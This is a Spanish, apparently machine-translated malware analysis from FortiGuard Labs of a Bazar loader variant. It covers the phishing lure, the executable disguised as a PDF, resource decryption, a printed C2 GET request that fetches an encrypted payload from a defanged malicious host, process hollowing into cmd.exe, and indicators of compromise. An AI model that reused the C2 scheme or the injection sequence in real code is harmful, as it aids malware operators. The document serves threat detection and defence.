Plataformas afectadas : Microsoft Windows
Partes afectadas:
Impacto de los usuarios de Windows : Controle y recopile información confidencial del dispositivo de la víctima, así como también entregue otro malware.
Nivel de gravedad: crítico
Bazar (que ha sido clasificado como la familia de malware Team9 que está desarrollando el grupo detrás de Trickbot) es un troyano de puerta trasera diseñado para atacar un dispositivo, recopilar información confidencial, controlar el sistema a través de comandos y entregar malware. El año pasado, se observó la entrega del malware TrickBot .
FortiGuard Labs notó recientemente un correo electrónico sospechoso a través del sistema de monitoreo de SPAM. Este correo electrónico fue diseñado para incitar a la víctima a abrir una página web para descargar un archivo ejecutable. La investigación adicional sobre este archivo ejecutable encontró que es una nueva variante de Bazar. En esta publicación, puede esperar aprender qué nuevas técnicas utiliza este Bazar para realizar un antianálisis, cómo se comunica con su servidor C2, qué datos confidenciales puede recopilar del dispositivo de la víctima y cómo puede enviar otro malware a el sistema de la víctima.
Página de descarga y correo electrónico de phishing
Para validar nuestra evaluación, capturamos algunos de los correos electrónicos de phishing anteriores de Bazar y su contenido es similar. Atraen al destinatario para que abra una página web para ver una versión en pdf de un informe de bonificación falso, un informe de quejas de clientes falsos o un extracto de facturación falso, etc. Puede ver dos ejemplos en las siguientes figuras, que fueron capturadas el 20 de enero y el 27 de enero , 2021.
Figura 1.1 Correo electrónico de phishing de Bazar capturado el 20 de enero de 2021
Figura 1.2 Correo electrónico de phishing de Bazar el 27 de enero de 2021Una vez que la víctima hace clic en cualquier hipervínculo en el correo electrónico, lleva a la víctima a una página web maliciosa, como se muestra en la Figura 1.3.
Figura 1.3 Página web que descarga el malware BazarHay tres hipervínculos, encerrados en un círculo en la imagen de la página web anterior, que apuntan al mismo enlace de descarga. Una instancia de los hipervínculos de descarga se ve así:
https [:] // doc-14-6g-docs googleusercontent.com/docs/securesc/m4jlrke7n9hladu0avuh39vorb58jrve/fgl9fo0g0p5o35at5vboiccqq552hmqf/1611168150000/16223329070176251062/11832846407481787782/1XjBjtKzYGKE1BZDg-8ISzpp4XoG-jfSs?e=download&authuser=0&nonce=nvmpahs236rou&user=11832846407481787782&hash= [.] 5ctf3a9bet7iv3njj965vh0c16pumigi
Cargador Bazar descargado
El archivo descargado (Priview_report20-01 [.] Exe) es un archivo ejecutable que utiliza un icono similar a un documento PDF para engañar a la víctima prevista. De forma predeterminada, Windows oculta la extensión real (por ejemplo, «.exe»).
La figura 2.1 muestra un análisis rápido del archivo. El lado izquierdo de la imagen muestra lo que ve la víctima y el lado derecho muestra lo que ven los investigadores en una herramienta de análisis de EP. (PE, o Portable Executable, es el formato nativo de los archivos binarios ejecutables [DLL, controladores y programas] para los sistemas operativos Microsoft Windows® de 32 bits).
Figura 2.1 El cargador Bazar descargado en una herramienta de análisisLa víctima puede asumir que el archivo es un documento PDF real y hacer doble clic en él para abrir el «informe» sin darse cuenta de que se está ejecutando un archivo ejecutable en segundo plano.
El archivo ejecutable descargado se reconoce como un archivo de 64 bits en la herramienta de análisis, lo que significa que solo se puede ejecutar en sistemas operativos Microsoft Windows de 64 bits.
Después de analizar este archivo, me di cuenta de que este archivo es un cargador de Bazar.
Una vez que se inicia el cargador de Bazar, se carga en su memoria un recurso encriptado que se esconde en el «Directorio de fuentes» con el ID «339» (hexadecimal 153H). En la Figura 2.2 puede ver los datos del recurso que se muestran en una herramienta de análisis.
Figura 2.2. Recurso encriptado 339 del cargador BazarAl descifrar los datos del recurso, se descubre un fragmento de código ASM (lenguaje ensamblador) y un archivo PE. Este código ASM, llamado por el cargador de Bazar, implementa dinámicamente el archivo PE en la memoria y lo ejecuta. La Figura 2.3 es una captura de pantalla de un depurador, que muestra dónde el código ASM estaba a punto de llamar al OEP (Punto de entrada original) del archivo PE implementado. Este archivo PE es el verdadero cargador de Bazar.
Figura 2.3. Llamar al OEP del archivo PE implementadoSumérgete en el Bazar Loader
El cargador Bazar real entonces inicia la comunicación con su servidor C2. Las cadenas de host y URL se descifran a partir de datos constantes en esa pila.
Figura 3.1. Una visualización de la cadena de host descifrada del servidor C2La figura 3.1 muestra la cadena de host C2 recién descifrada con el número de puerto (englewoodcarwashh [.] Us: 443) en la subventana de memoria. Luego llama a la API getaddrinfo (C2_host_string) para obtener la dirección IP del servidor C2.
Envía una solicitud GET con la URL “/ cgi-bin / req5” a su servidor C2 utilizando el protocolo SSL. La Figura 3.2 es una captura de pantalla de un depurador que muestra el momento en que estaba a punto de llamar a la API EncryptMessage () para cifrar toda la solicitud GET.
Figura 3.2. Un paquete cifrado enviado al servidor C2Copié el paquete a continuación para una vista más clara:
GET / cgi-bin / req5 HTTP / 1.1
Host: englewoodcarwashh nosotros [.]
User-Agent: user_agent
Fecha: Mie 20 Ene 2021 21:05:11 GMT
rvpoft: z3qTFLIkBrYVD3igIKy1kAS99rBL0V35k8NKFUG1dQGVw4ICpFV8y9cAiVS% 2FAu6RTpaHgZRVuWMsnLVhpTZaRMdnvCDvJrOqKhawD1tGooNxMjZZnR5Q% 2FC0rSMYa5ErdDZcN7UWqCAw5xmvt% 2Fcq020hGeRTxJ02eUcqzJ5U0Ux2QKtWQdv7RNMVZ6j8tHBSb0tfUwZjAwbSJaNdikJ83WZ7hhSFtG8FXPqMdfYl8E6fjVTzP7VY4KYoVvOyZN228qet2VdoEorNx% 2FnD2nsa3AcG5cmjpi4g% 2F% 2FM6SBCm1WTkwe6V2e00Y % 2BdN% 2BxWIjwtakTAoi3VD2OUZC3gjZ% 2BiEAvw% 3D%
Conexión 3D : Keep-Alive
Es posible que haya notado que el valor de «rvpoft» está codificado en base64. Era un hash del valor «Fecha:» (» miércoles 20 de enero de 2021 21:05:11 GMT» ). Calculando el hash de “Date:” y comparándolo con el valor de hash que lleva “rvpoft” en el servidor C2, puede verificar si el paquete es de su verdadero cliente.
Figura 3.3. La carga útil descifrada de Bazar regresó del servidor C2Una vez que pasa la verificación del paquete, el servidor C2 responde con una carga útil de Bazar cifrada al cliente (cargador de Bazar). Esto se descifra en la función de API BCryptDecrypt () que es llamada por el cargador de Bazar. La Figura 3.3, arriba, muestra el archivo PE de carga útil de Bazar recién descifrado en la subventana de memoria en la parte inferior.
El archivo de carga útil es un archivo EXE, que se inyectará en un proceso «cmd.exe» recién creado para ocultar su proceso real para que la víctima no lo note. Para hacer esto, el cargador de Bazar llama a API CreateProcessA () para crear un proceso «cmd» con un CreateFlags de valor «0x80014» que es una combinación de «EXTENDED_STARTUPINFO_PRESENT, CREATE_NEW_CONSOLE y CREATE_SUSPENDED». Consulte la Figura 3.4, a continuación, para obtener más detalles.
Figura 3.4. Creación del proceso «cmd.exe» llamando a la API CreateProcessA ()Para inyectar la carga útil de Bazar en el proceso «cmd.exe» recién creado y ejecutarlo, debe llamar a algunas API relevantes, como NtGetContextThread (), VirtualAllocEx (), NtUnmapViewOfSection (), NtWriteVirtualMemory (), ZwSetContextThread () y ZwResumeThread ().
Conclusión
Esta es la parte I de nuestro análisis de esta nueva variante de Bazar. En esta publicación, expliqué cómo se propagó un cargador de Bazar en una campaña de phishing . Mostré cómo el cargador de Bazar se comunica con su servidor C2 para descargar la carga útil de Bazar. También presenté cómo se implementa el archivo de carga útil en un proceso «cmd.exe» recién creado.
Proporcionaré un análisis del archivo de carga útil de Bazar que se ejecuta en «cmd.exe» en la parte II de este análisis . En ese informe, aprenderá cómo Bazar se comunica con su servidor C2 y qué acciones puede realizar Bazar en el dispositivo de una víctima a través de comandos recibidos de su servidor C2.
Protecciones Fortinet
Los clientes de Fortinet ya están protegidos de esta variante de Bazar con los servicios de filtrado web y antivirus de FortiGuard de la siguiente manera:
Las URL de descarga del cargador Bazar están clasificadas como » Sitios web maliciosos » por el servicio de filtrado web FortiGuard.
Los archivos descargados son detectados como » W64 / Bazar.CFI! Tr » y bloqueados por el servicio FortiGuard AntiVirus.
El servicio FortiGuard AntiVirus es compatible con FortiGate , FortiMail, FortiClient y FortiEDR . El motor Fortinet AntiVirus es parte de cada una de esas soluciones. Como resultado, los clientes que tienen estos productos con protecciones actualizadas están protegidos.
También sugerimos a nuestros lectores que realicen la capacitación gratuita NSE – NSE 1 – Information Security Awareness , que tiene un módulo sobre amenazas de Internet diseñado para ayudar a los usuarios finales a aprender cómo identificarse y protegerse de los ataques de phishing.
IOC:
URLs
hxxps [:] // informe de quejas2020 [.] gr8 [.] com /
hxxps [:] // aplicación [.] getresponse [.] com / lpc_unpublish.html
hxxps [:] // englewoodcarwashh [.] us: 443 / cgi-bin / req5
Muestra SHA-256
[Preview_report20-01.exe]
0BFB64DFF37DD50449AF75EC204F0B4981AC3B16790458F6A492C7B27905A9A7
[Print-report27-01.exe]
6E6C0EBC1BB2D99CE358612572F4BCF52578527EEEF6629FFCE81B35F5FA1A99
